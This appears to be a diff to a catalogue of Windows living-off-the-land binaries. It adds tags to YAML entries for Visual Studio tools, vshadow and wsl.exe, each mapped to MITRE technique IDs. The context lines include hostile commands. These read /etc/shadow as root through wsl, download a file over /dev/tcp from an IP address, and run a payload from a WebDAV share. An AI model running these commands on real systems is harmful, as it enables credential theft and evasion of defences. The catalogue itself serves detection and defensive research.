|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: .NetObjects
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\arm64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
|
@@ -20,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
|
||||
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
|
||||
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
|
||||
@@ -27,6 +29,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\vshadow.exe
|
||||
Detection:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\vsjitdebugger.exe
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: XOML
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: wsl.exe -u root -e cat /etc/shadow
|
||||
Description: Cats /etc/shadow file as root
|
||||
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: wsl.exe --exec bash -c "<command>"
|
||||
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
|
||||
Usecase: Performs execution of arbitrary Linux commands.
|
||||
@@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||||
Description: Downloads file from 192.168.1.10
|
||||
Usecase: Download file
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winfile.exe
|
||||
- Path: C:\Windows\winfile.exe
|
||||
|
Reference in New Issue
Block a user